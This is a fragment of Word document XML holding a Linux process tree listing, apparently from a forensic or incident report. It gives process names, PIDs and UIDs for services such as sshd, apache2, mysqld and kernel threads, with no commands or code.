    <w:p w14:paraId="0ACCAD49"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.lxcfs               737                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068D4FF" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69208490"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.atd                 749                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0068B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8A6740"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.polkitd             771                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C7B60C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA7BB0C"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.agetty              785                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559FC300" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBF8910"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.agetty              791                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D08AC44" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF9EC27"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.systemd-network     2788            100            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5A1AC" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E556A1"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.systemd-resolve     2804            101            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D7E56D" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09393CC0"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.systemd-timesyn     2818            62583          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D896B4D" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DC588E"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.systemd-journal     2825                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE65313" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673E3260"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">.uuidd               5077            106            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0DBB2C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581F7134"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.systemd-udevd       5160                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD25476" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4946BA0C"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.iscsid              10988                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FF05AA" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395C3640"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.iscsid              10989                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C891994" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219A1190"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.networkd-dispat     11199                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A74644" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA092C3"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.sshd                12159                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563F7026" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612B0753"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..sshd               20483                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE4CA7" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC4D5BE"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...sshd              20576           1000           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518F7D41" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C48A4A6"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....bash             20577           1000           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C5179C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E17137"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.....sudo            20893                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C276BDB" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C0F6AA"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......insmod         20894                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F615C2A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC3ADA1"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.mysqld              5127            111            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519AC86" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E8B31C"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.apache2             5469                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC4E6C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="482C06CC"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..apache2            19704           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E59527C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0DA0D7"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..apache2            19705           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE434D" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E0450E"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..apache2            19706           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4528BC29" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C5E19B"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..apache2            19707           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C74CE8" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396CE800"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..apache2            19708           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE3C37" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220D2909"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..apache2            19952           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B9054F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DEBFA5C"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...[sh]              20381           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330DA727" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F08F30"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..apache2            19953           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD25BF6" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B1F056"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..apache2            20230           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1EA935" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="005E1386"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..apache2            20231           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054E42FB" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341FADF5"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..apache2            20232           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266C39E1" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E616546"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..apache2            20233           33             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F5240A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39770B6B"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.snapd               6219                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7774490E" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FDCB4F"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.amazon-ssm-agen     6445                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43238B7B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716D5B74"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.rsyslogd            26254           102            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AACF04" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5A7578"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.master              26489                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D4A46B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285927AE"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..qmgr               26500           112            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB48027" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5402B1"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..pickup             20703           112            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A5257F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F84140"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.systemd             20485           1000           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119C3E00" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EC2551"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..(sd-pam)           20486           1000           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320336B4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486071F0"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[kthreadd]           2                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405673C7" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FFD20A"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.[kworker/0:0H]      4                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA471B5" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2998E9"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.[mm_percpu_wq]      6                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AB137A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DBDCDD"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.[ksoftirqd/0]       7                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281730A6" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B4E94C"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.[rcu_sched]         8                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB21790" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4166C860"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.[rcu_bh]            9                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773EBF2F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F21D475"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.[migration/0]       10                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39600A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE04E37"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.[watchdog/0]        11                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D26441C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B257949"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.[cpuhp/0]           12                             </w:t>
      </w:r>
    </w:p>
